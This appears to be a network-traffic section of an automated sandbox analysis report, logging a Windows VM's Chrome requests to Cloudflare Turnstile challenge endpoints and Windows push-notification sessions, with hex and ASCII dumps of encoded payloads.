                                                                                              2024-12-19 13:36:11 UTC1369INData Raw: 30 64 6c 52 2b 64 33 31 59 64 6f 70 38 6b 49 61 56 63 70 4e 67 66 48 61 45 71 34 6d 70 73 59 56 2f 71 6e 32 67 6e 6f 47 74 6a 37 65 61 74 37 6d 61 76 72 79 37 74 59 4f 32 76 35 69 6f 75 71 4b 35 74 72 37 48 6f 5a 6d 6b 6f 4c 72 46 6a 4e 57 54 72 63 33 61 7a 37 4b 72 31 37 65 74 73 71 76 54 31 64 79 6b 6f 62 2f 44 70 37 7a 43 78 2b 50 6e 79 72 32 35 78 37 4c 77 37 64 37 66 79 4d 57 34 32 37 7a 63 74 64 53 32 38 2f 72 58 75 74 66 63 2b 74 50 56 2f 74 32 2b 43 77 58 58 36 51 6a 74 7a 64 38 41 41 51 77 57 36 50 72 56 31 2f 76 32 38 66 50 61 45 66 45 43 37 75 45 44 45 76 7a 37 47 2b 63 6a 34 43 67 4f 2f 53 48 72 4a 77 58 73 41 53 38 6a 39 67 76 30 42 76 34 59 44 51 49 35 4a 45 51 61 45 6b 45 57 4a 42 6a 39 53 67 55 6f 4a 68 70 4f 4a 78 45 6a 55 45 38 71 46 53
                                                                                              Data Ascii: 0dlR+d31Ydop8kIaVcpNgfHaEq4mpsYV/qn2gnoGtj7eat7mavry7tYO2v5iouqK5tr7HoZmkoLrFjNWTrc3az7Kr17etsqvT1dykob/Dp7zCx+Pnyr25x7Lw7d7fyMW427zctdS28/rXutfc+tPV/t2+CwXX6Qjtzd8AAQwW6PrV1/v28fPaEfEC7uEDEvz7G+cj4CgO/SHrJwXsAS8j9gv0Bv4YDQI5JEQaEkEWJBj9SgUoJhpOJxEjUE8qFS
                                                                                              2024-12-19 13:36:11 UTC1369INData Raw: 57 35 68 68 67 6e 31 7a 67 36 65 6e 71 57 61 43 6d 6f 5a 6f 61 59 61 7a 6b 49 61 4e 71 57 2b 4a 63 6e 43 6a 66 48 6d 33 6e 72 53 4f 75 36 75 34 64 34 36 76 73 36 6d 4b 77 34 75 62 78 4d 61 70 70 74 4f 4c 71 4b 2b 54 71 63 65 55 72 61 54 55 33 62 62 49 79 70 79 79 72 4e 4f 6a 76 37 33 70 35 75 6e 67 37 4f 58 66 35 75 6d 37 33 4e 4f 75 35 65 65 32 72 38 57 77 2b 2b 37 53 31 4e 76 63 36 38 30 41 30 74 6e 36 7a 2f 48 4a 33 41 6b 48 2b 75 41 50 2b 63 34 47 45 2b 54 72 30 66 63 61 34 65 4d 5a 30 78 66 75 48 76 54 38 38 53 55 66 44 2f 4d 66 45 77 54 31 4b 50 6f 43 4c 76 63 61 38 51 55 78 48 76 4d 51 37 69 4d 56 46 43 72 36 4c 54 41 55 4d 68 31 42 46 78 41 2b 4e 69 51 6a 4f 41 4d 59 4b 43 51 47 4b 43 42 4d 45 43 6f 39 46 52 51 6b 52 7a 4d 72 46 56 30 75 4b 79 74
                                                                                              Data Ascii: W5hhgn1zg6enqWaCmoZoaYazkIaNqW+JcnCjfHm3nrSOu6u4d46vs6mKw4ubxMapptOLqK+TqceUraTU3bbIypyyrNOjv73p5ung7OXf5um73NOu5ee2r8Ww++7S1Nvc680A0tn6z/HJ3AkH+uAP+c4GE+Tr0fca4eMZ0xfuHvT88SUfD/MfEwT1KPoCLvca8QUxHvMQ7iMVFCr6LTAUMh1BFxA+NiQjOAMYKCQGKCBMECo9FRQkRzMrFV0uKyt
                                                                                              2024-12-19 13:36:11 UTC1369INData Raw: 6e 4f 46 71 4a 71 6e 5a 35 78 6e 73 47 6c 36 6e 33 78 73 66 72 4f 55 63 6f 4b 52 74 6e 61 47 6c 58 39 36 69 70 4b 78 6a 59 43 34 70 72 53 70 69 61 47 46 6e 37 43 6c 77 71 4b 79 72 63 32 77 70 4d 61 59 75 4b 61 31 74 61 32 72 33 72 32 77 30 64 4b 78 78 62 44 58 33 70 79 7a 36 61 54 41 76 4f 37 61 30 72 33 69 78 39 36 76 30 73 7a 73 7a 4e 33 6f 32 38 72 7a 2f 50 66 37 2f 64 33 56 33 2f 7a 69 30 67 50 59 37 4f 76 4f 7a 4f 66 78 35 73 72 50 45 78 44 71 34 67 4d 5a 42 78 6a 6f 36 76 48 64 48 77 41 64 2b 50 34 6b 45 75 51 6e 41 53 59 62 48 41 44 73 43 43 62 38 41 69 50 31 45 6a 59 4f 4e 2f 55 34 4f 68 34 2f 50 54 77 31 42 44 64 41 46 43 55 2f 52 78 30 64 52 79 6b 2b 45 45 4e 4d 4a 68 34 70 4a 54 39 4b 45 56 6f 55 4c 46 51 35 58 45 6b 74 58 6c 4a 51 4d 54 42 61
                                                                                              Data Ascii: nOFqJqnZ5xnsGl6n3xsfrOUcoKRtnaGlX96ipKxjYC4prSpiaGFn7ClwqKyrc2wpMaYuKa1ta2r3r2w0dKxxbDX3pyz6aTAvO7a0r3ix96v0szszN3o28rz/Pf7/d3V3/zi0gPY7OvOzOfx5srPExDq4gMZBxjo6vHdHwAd+P4kEuQnASYbHADsCCb8AiP1EjYON/U4Oh4/PTw1BDdAFCU/Rx0dRyk+EENMJh4pJT9KEVoULFQ5XEktXlJQMTBa
                                                                                              2024-12-19 13:36:11 UTC1369INData Raw: 2b 5a 70 61 42 2b 67 35 57 6e 69 4b 57 5a 70 62 6c 33 72 61 61 2b 75 4a 71 50 77 70 66 45 76 33 2b 5a 6f 36 58 45 6e 61 61 49 69 36 4b 72 76 34 75 78 6a 61 65 4d 74 4b 4f 6c 6d 4e 50 4d 73 64 47 77 71 74 2b 38 33 64 66 62 34 62 2f 54 31 73 76 62 31 38 33 50 33 38 6e 70 79 2b 4b 78 78 4d 54 71 38 38 6e 35 75 64 57 33 39 66 6a 5a 41 67 50 5a 33 63 54 58 2f 65 62 78 39 38 58 6c 2f 65 67 45 32 51 63 51 78 51 4c 2b 43 2b 4d 49 43 50 6e 62 35 50 67 55 36 75 6e 77 45 74 34 52 2f 4f 50 31 47 50 67 6a 36 69 6e 73 2b 75 30 76 4d 41 54 77 4d 79 51 42 41 75 6f 52 39 2f 59 36 4c 42 2f 38 4c 51 34 67 39 52 30 41 4e 67 67 53 4b 55 77 48 53 77 51 47 44 53 63 74 56 42 46 54 4c 56 4d 68 53 43 6c 55 47 43 55 79 4c 43 68 65 4c 6a 49 69 55 30 39 6d 4a 30 4a 4b 4f 69 6c 62 58
                                                                                              Data Ascii: +ZpaB+g5WniKWZpbl3raa+uJqPwpfEv3+Zo6XEnaaIi6Krv4uxjaeMtKOlmNPMsdGwqt+83dfb4b/T1svb183P38npy+KxxMTq88n5udW39fjZAgPZ3cTX/ebx98Xl/egE2QcQxQL+C+MICPnb5PgU6unwEt4R/OP1GPgj6ins+u0vMATwMyQBAuoR9/Y6LB/8LQ4g9R0ANggSKUwHSwQGDSctVBFTLVMhSClUGCUyLCheLjIiU09mJ0JKOilbX
                                                                                              2024-12-19 13:36:11 UTC1369INData Raw: 4a 6f 48 4f 54 67 61 61 46 6b 71 71 31 66 72 78 37 65 5a 61 78 70 4c 32 46 6e 6f 53 71 69 6f 4c 47 78 5a 32 6d 30 6f 79 54 78 61 7a 48 71 38 69 6c 32 36 33 4d 7a 39 43 75 6b 72 57 61 75 4c 37 58 33 37 6a 6f 76 64 57 6d 36 2b 37 68 77 37 6d 73 77 71 2b 6d 36 76 61 31 35 64 48 31 75 2b 6a 79 2b 4c 33 76 38 67 53 31 41 66 66 6d 78 64 2f 32 77 39 2b 2b 34 66 6e 65 36 76 41 41 35 51 58 6c 44 75 73 4a 35 52 7a 58 39 2b 55 4c 36 66 59 50 47 75 49 68 33 39 33 36 46 67 6b 69 36 51 50 6f 44 2b 37 6d 4b 79 6f 43 43 7a 66 77 39 79 6f 52 4c 41 73 57 39 44 63 53 47 2f 67 33 46 6b 41 46 50 68 6f 6a 4e 45 59 65 46 30 52 50 49 77 4d 75 55 53 4e 44 52 30 77 56 52 69 31 57 48 43 63 59 46 78 31 4e 59 31 38 79 50 44 30 6b 4a 55 4a 62 5a 53 77 6a 54 6e 42 43 59 57 52 6b 4c 69
                                                                                              Data Ascii: JoHOTgaaFkqq1frx7eZaxpL2FnoSqioLGxZ2m0oyTxazHq8il263Mz9CukrWauL7X37jovdWm6+7hw7mswq+m6va15dH1u+jy+L3v8gS1Affmxd/2w9++4fne6vAA5QXlDusJ5RzX9+UL6fYPGuIh3936Fgki6QPoD+7mKyoCCzfw9yoRLAsW9DcSG/g3FkAFPhojNEYeF0RPIwMuUSNDR0wVRi1WHCcYFx1NY18yPD0kJUJbZSwjTnBCYWRkLi
                                                                                              2024-12-19 13:36:11 UTC1369INData Raw: 76 4c 4f 30 6a 37 43 64 75 70 50 45 74 37 32 58 75 4c 2f 48 6e 62 79 70 76 71 44 41 78 38 4f 6c 6e 71 33 50 71 64 69 59 30 71 76 4d 73 64 47 77 75 72 33 61 74 65 54 46 33 72 72 6f 32 2b 4b 38 74 73 58 6e 77 63 72 4e 36 4d 54 6b 37 2f 50 4a 30 75 50 75 7a 4e 62 4e 38 74 44 61 2b 2f 6a 55 7a 73 54 39 32 4e 4c 33 42 4e 77 4e 34 51 50 66 41 51 51 4c 35 68 55 49 43 4f 6e 79 46 42 48 74 48 52 41 55 38 52 45 59 49 50 58 75 47 42 76 33 47 51 49 68 2f 53 30 43 4b 41 49 78 38 43 6b 47 2f 69 41 72 43 51 4d 57 4d 41 30 48 46 6a 63 54 51 54 41 33 46 6a 55 69 51 42 6b 6a 4b 6a 77 65 50 53 5a 4d 49 68 73 75 54 43 5a 56 52 45 73 71 4d 79 35 55 4c 56 30 64 56 44 4a 68 4d 6c 67 31 56 54 35 66 4f 46 6c 6b 57 7a 39 74 59 47 46 42 59 56 78 71 52 6a 39 6b 62 45 6c 35 4f 58 42
                                                                                              Data Ascii: vLO0j7CdupPEt72XuL/HnbypvqDAx8Olnq3PqdiY0qvMsdGwur3ateTF3rro2+K8tsXnwcrN6MTk7/PJ0uPuzNbN8tDa+/jUzsT92NL3BNwN4QPfAQQL5hUICOnyFBHtHRAU8REYIPXuGBv3GQIh/S0CKAIx8CkG/iArCQMWMA0HFjcTQTA3FjUiQBkjKjwePSZMIhsuTCZVREsqMy5ULV0dVDJhMlg1VT5fOFlkWz9tYGFBYVxqRj9kbEl5OXB
                                                                                              2024-12-19 13:36:11 UTC1369INData Raw: 58 6d 76 66 4a 36 63 6f 49 54 4b 6e 73 75 2f 6c 70 79 39 6a 4e 4b 6d 30 37 2b 65 70 4d 57 55 32 71 37 61 6c 4d 71 73 71 71 43 33 73 75 44 54 35 37 4c 43 71 4f 47 2f 36 61 66 6b 77 2b 36 6f 37 38 58 6b 34 2f 61 74 35 4f 66 37 78 74 61 38 39 64 48 62 30 51 44 4e 42 4d 50 39 32 77 66 41 43 4e 66 39 36 65 6e 46 36 2b 58 75 36 4f 33 73 31 75 4d 4b 39 66 62 76 44 75 30 63 36 76 6e 63 2b 50 59 6a 34 42 50 79 4b 65 67 43 2b 68 7a 31 4c 50 76 35 37 79 6f 49 4e 41 49 30 41 77 51 4b 4f 41 67 57 2b 42 6b 54 51 42 49 76 45 45 55 46 49 68 63 34 49 6b 67 5a 46 67 78 47 4a 45 39 51 55 42 35 57 4b 55 4d 6d 49 53 4a 55 45 6b 77 63 56 6a 52 67 4f 6d 41 79 4c 53 35 67 48 6c 6f 36 61 44 6f 31 4e 6d 63 6d 59 44 42 71 53 48 52 4b 64 45 5a 42 51 6e 4d 79 62 6b 35 38 54 6b 6c 4b
                                                                                              Data Ascii: XmvfJ6coITKnsu/lpy9jNKm07+epMWU2q7alMqsqqC3suDT57LCqOG/6afkw+6o78Xk4/at5Of7xta89dHb0QDNBMP92wfACNf96enF6+Xu6O3s1uMK9fbvDu0c6vnc+PYj4BPyKegC+hz1LPv57yoINAI0AwQKOAgW+BkTQBIvEEUFIhc4IkgZFgxGJE9QUB5WKUMmISJUEkwcVjRgOmAyLS5gHlo6aDo1NmcmYDBqSHRKdEZBQnMybk58TklK


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              28192.168.2.649809104.18.94.414436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:36:13 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1491058030:1734614036:lGnvY1elWyH7EhRRkOdPFDBDdTK2Q-wX130xIM0yJB4/8f47c7718f624386/7H8LG5SnqbO3T10Wvi8IaJOK4p16EBaa_PQ0ofUlBXE-1734615360-1.1.1.1-uFkKOZXfTSe_1mvdIu74Z9OPpAcKlUkRYImsDd1U2O350IQ4ldpJZv.sdf1vctVv HTTP/1.1
                                                                                              Host: challenges.cloudflare.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:36:13 UTC379INHTTP/1.1 404 Not Found
                                                                                              Date: Thu, 19 Dec 2024 13:36:13 GMT
                                                                                              Content-Type: application/json
                                                                                              Content-Length: 7
                                                                                              Connection: close
                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                              cf-chl-out: hiykcxgWOWG/IONsYXrmg33Id4vR5Ff7cto=$6J0IWlju2us4wOdh
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f47c7c3ea8c8c75-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-12-19 13:36:13 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                              Data Ascii: invalid


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              29192.168.2.64980820.198.118.190443
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:36:13 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 35 33 59 46 7a 55 4d 47 4d 30 75 68 61 4e 2b 6b 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 64 65 33 31 39 39 39 63 31 34 31 32 34 37 37 0d 0a 0d 0a
                                                                                              Data Ascii: CNT 1 CON 305MS-CV: 53YFzUMGM0uhaN+k.1Context: 2de31999c1412477
                                                                                              2024-12-19 13:36:13 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                              2024-12-19 13:36:13 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 35 33 59 46 7a 55 4d 47 4d 30 75 68 61 4e 2b 6b 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 64 65 33 31 39 39 39 63 31 34 31 32 34 37 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 52 77 4f 61 41 2f 57 53 54 55 49 37 56 76 56 4c 72 36 6c 42 56 65 79 30 4b 45 5a 4a 71 75 45 79 42 49 74 2f 32 63 46 6e 42 67 43 2b 48 53 5a 30 31 31 62 68 6f 73 36 44 6f 56 59 68 63 49 4d 74 49 58 79 72 39 76 2b 69 34 78 57 30 4e 52 46 67 4a 68 49 51 6a 51 6e 79 6b 4b 41 2f 33 4f 6b 6b 6d 4f 78 47 70 30 32 66 47 6b 4c 75
                                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 53YFzUMGM0uhaN+k.2Context: 2de31999c1412477<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYRwOaA/WSTUI7VvVLr6lBVey0KEZJquEyBIt/2cFnBgC+HSZ011bhos6DoVYhcIMtIXyr9v+i4xW0NRFgJhIQjQnykKA/3OkkmOxGp02fGkLu
                                                                                              2024-12-19 13:36:13 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 35 33 59 46 7a 55 4d 47 4d 30 75 68 61 4e 2b 6b 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 64 65 33 31 39 39 39 63 31 34 31 32 34 37 37 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: 53YFzUMGM0uhaN+k.3Context: 2de31999c1412477<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                              2024-12-19 13:36:14 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                              Data Ascii: 202 1 CON 58
                                                                                              2024-12-19 13:36:14 UTC58INData Raw: 4d 53 2d 43 56 3a 20 55 51 38 65 70 71 57 66 53 45 32 6c 33 65 45 46 77 47 65 58 37 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                              Data Ascii: MS-CV: UQ8epqWfSE2l3eEFwGeX7w.0Payload parsing failed.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              30192.168.2.649820104.18.94.414436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:36:18 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1491058030:1734614036:lGnvY1elWyH7EhRRkOdPFDBDdTK2Q-wX130xIM0yJB4/8f47c7718f624386/7H8LG5SnqbO3T10Wvi8IaJOK4p16EBaa_PQ0ofUlBXE-1734615360-1.1.1.1-uFkKOZXfTSe_1mvdIu74Z9OPpAcKlUkRYImsDd1U2O350IQ4ldpJZv.sdf1vctVv HTTP/1.1
                                                                                              Host: challenges.cloudflare.com
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 33810
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              Content-type: application/x-www-form-urlencoded
                                                                                              CF-Chl-RetryAttempt: 0
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              CF-Challenge: 7H8LG5SnqbO3T10Wvi8IaJOK4p16EBaa_PQ0ofUlBXE-1734615360-1.1.1.1-uFkKOZXfTSe_1mvdIu74Z9OPpAcKlUkRYImsDd1U2O350IQ4ldpJZv.sdf1vctVv
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: */*
                                                                                              Origin: https://challenges.cloudflare.com
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qmivf/0x4AAAAAAAy6q7iduvs50k8-/auto/fbE/normal/auto/
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:36:18 UTC16384OUTData Raw: 76 5f 38 66 34 37 63 37 37 31 38 66 36 32 34 33 38 36 3d 31 51 62 65 64 6f 52 78 46 35 51 52 46 63 78 52 48 55 39 55 66 63 33 55 49 55 73 65 6e 76 67 55 7a 52 63 55 4a 67 35 6b 52 37 55 5a 59 32 33 54 52 4b 55 31 65 52 6b 52 6e 33 55 35 43 55 61 77 55 64 55 70 62 62 62 77 33 55 33 58 55 37 72 57 25 32 62 6b 55 4c 65 52 7a 55 43 65 6f 77 55 2b 4c 43 77 32 55 50 53 56 32 55 69 4f 35 55 55 78 55 52 69 51 6f 55 32 46 76 63 50 46 79 39 66 31 4c 79 6f 63 64 31 52 55 69 46 55 39 56 55 46 4c 55 70 32 52 59 55 52 78 55 6f 49 77 55 57 4b 45 2d 6f 67 55 38 55 47 7a 62 6a 76 61 62 24 4a 71 55 6f 67 77 62 32 31 61 65 69 48 46 55 6b 6d 71 55 6e 49 67 7a 70 52 77 55 52 54 68 55 71 76 65 58 55 61 50 35 24 65 77 58 2b 77 4f 57 73 66 46 53 69 46 77 24 56 74 39 48 2d 4f 4f
                                                                                              Data Ascii: v_8f47c7718f624386=1QbedoRxF5QRFcxRHU9Ufc3UIUsenvgUzRcUJg5kR7UZY23TRKU1eRkRn3U5CUawUdUpbbbw3U3XU7rW%2bkULeRzUCeowU+LCw2UPSV2UiO5UUxURiQoU2FvcPFy9f1Lyocd1RUiFU9VUFLUp2RYURxUoIwUWKE-ogU8UGzbjvab$JqUogwb21aeiHFUkmqUnIgzpRwURThUqveXUaP5$ewX+wOWsfFSiFw$Vt9H-OO
                                                                                              2024-12-19 13:36:18 UTC16384OUTData Raw: 4a 55 33 67 6f 46 55 4b 55 6a 55 62 32 47 65 47 67 43 58 55 32 55 75 55 78 65 50 54 6f 7a 55 75 55 50 32 6f 52 55 47 55 52 5a 57 6f 55 32 65 4c 65 6f 57 55 48 54 63 65 55 4f 55 4f 65 52 6e 55 65 55 69 65 61 46 61 24 55 7a 55 70 43 52 50 55 79 65 63 6b 55 6a 55 34 65 4f 72 24 43 6f 42 55 63 76 61 39 44 67 33 66 2b 61 33 55 2d 42 46 55 49 50 55 52 32 35 55 6f 6e 65 24 33 47 67 55 47 55 4a 55 6f 6b 61 4b 6f 68 50 55 7a 55 6d 32 50 6b 75 62 61 55 6a 49 55 4a 62 61 33 55 66 46 35 74 55 47 55 54 6b 6f 6b 6f 4e 55 72 32 62 71 6f 4b 55 35 54 65 78 52 6f 65 4e 38 75 62 6f 68 55 24 67 70 53 61 37 55 6b 55 4f 33 61 37 55 57 55 50 67 52 7a 32 75 55 63 76 6f 4b 55 6e 55 63 32 33 58 55 49 55 4f 33 6f 6e 65 6b 55 33 78 6f 6e 65 70 55 70 39 76 39 55 24 33 6f 75 4a 77 55
                                                                                              Data Ascii: JU3goFUKUjUb2GeGgCXU2UuUxePTozUuUP2oRUGURZWoU2eLeoWUHTceUOUOeRnUeUieaFa$UzUpCRPUyeckUjU4eOr$CoBUcva9Dg3f+a3U-BFUIPUR25Uone$3GgUGUJUokaKohPUzUm2PkubaUjIUJba3UfF5tUGUTkokoNUr2bqoKU5TexRoeN8ubohU$gpSa7UkUO3a7UWUPgRz2uUcvoKUnUc23XUIUO3onekU3xonepUp9v9U$3ouJwU
                                                                                              2024-12-19 13:36:18 UTC1042OUTData Raw: 56 48 58 2b 4b 47 6a 56 67 46 38 48 46 6f 55 33 67 4a 6b 70 38 72 6a 77 33 75 73 69 61 42 6c 33 4c 75 66 4a 32 36 5a 35 59 36 37 65 67 31 36 2b 35 56 51 37 24 33 61 76 38 37 33 24 6e 4b 46 74 30 78 52 74 70 35 2b 63 4e 43 49 4e 5a 32 63 51 4c 4b 4b 64 6c 36 62 35 47 6d 44 4b 71 62 63 78 61 73 5a 34 78 41 6b 61 77 55 76 2d 53 48 65 6a 72 6e 51 47 43 54 64 52 32 4f 56 2d 51 4b 2b 54 44 58 67 52 67 30 6f 55 5a 66 2b 30 44 6e 36 64 66 51 35 44 56 36 36 39 6f 69 44 79 36 37 39 79 66 6e 76 6e 62 67 6f 37 68 5a 36 38 2b 6e 62 38 61 55 4c 6b 61 4f 56 55 7a 30 46 6f 49 56 66 54 24 63 47 72 56 46 54 61 53 59 41 5a 6d 50 58 37 63 73 34 49 41 68 39 54 51 44 5a 41 76 49 6d 50 44 32 47 30 4a 79 38 35 42 65 62 43 67 32 55 58 36 36 4c 54 41 55 45 35 4e 37 6a 31 71 39 55
                                                                                              Data Ascii: VHX+KGjVgF8HFoU3gJkp8rjw3usiaBl3LufJ26Z5Y67eg16+5VQ7$3av873$nKFt0xRtp5+cNCINZ2cQLKKdl6b5GmDKqbcxasZ4xAkawUv-SHejrnQGCTdR2OV-QK+TDXgRg0oUZf+0Dn6dfQ5DV669oiDy679yfnvnbgo7hZ68+nb8aULkaOVUz0FoIVfT$cGrVFTaSYAZmPX7cs4IAh9TQDZAvImPD2G0Jy85BebCg2UX66LTAUE5N7j1q9U
                                                                                              2024-12-19 13:36:18 UTC1312INHTTP/1.1 200 OK
                                                                                              Date: Thu, 19 Dec 2024 13:36:18 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4544
                                                                                              Connection: close
                                                                                              cf-chl-out-s: QxbsLOH/cQF2pjAoXu8lW1elprcP7187lLQzHYpE6zxIuCpawY38CjXJTw7doFRlkGifVYLC8+uolef/cYz9IxhI/mrYEE1fjAx9r57e0tdNqQPTRDeRx0LiIMS+8lSqoXfOP6Y+ZnWOKZPlmjjo2WJ4+24y0oGVzlqLaILf82yR6m3FCdyQE/iClG+qnLBcJzBfUvMZwnRLteSFH2apcaL60ttIjQdkhxaaURWrSG8EtvOXmQz691FBKpbcc2HUVgahZKiw9jTf7Va3i6cYlObZXRyNUbKGNXRqgZB+SGoP0KaqDM+NliDNt454FIhOVwEiue+6buu36O2EOnAnsyEFzSUUUoPatCnPJ9vBozTMiAgp1rRKyd1sRVoKmoSnhq1WHi0pUylyNLsJ8bAzPJYp0vbhwZ0Zd8aLOVrwixhMqKRzUPS9IGFHUt34raBdPrKbR0QkUSmhdPsezs40IO/4GP92ALmjzRgcwNpafOYXSjMvG5Ql3x448Jqy+bCD4pY8jDT5Ivtq1g1nMAXB7MGY/HRqa1jgvGWaIhkpxRy8TndQkXM79Uf2HwWsV8MsxkXV22nhyy/p+LHdQJ2KI4NUSlbyY+aUXIX9MqqG5zqgdU7mXwukU8Y9OVrxZHj0Kl+JgnXU94ffHk+sibBMIhgzBCQBWPIyJS7ceXe52ks+L+xA6ZcWyargovC7lv2t0tBkuzMZy9wOCkfn8KEk2mwADydQBm47rPAqNDosB8iyT5ILVE9AnzUjpjgs52Ur0Jr1f1JRxW5l7zCTfJ6+UkCZUmP/te54igxqg83r564wKQcTYEgIX6rSBpPtudLJwuNafshMLNt3tVgvgCNi2EH115B5jQfY3YUwJ/ck4ke+oNCAx8CtViWRLFEOYZRrs6DH1VU+38/mqWRkgQM3firhEWMicIJ5ekGrwTI87FZxJwS33Ujrzx0xoG2VY1wqqjWgoUHRF5XOASrr9aG0ykof6nJfjFXN+dVSmUsuh6RL0SxEQQ [TRUNCATED]
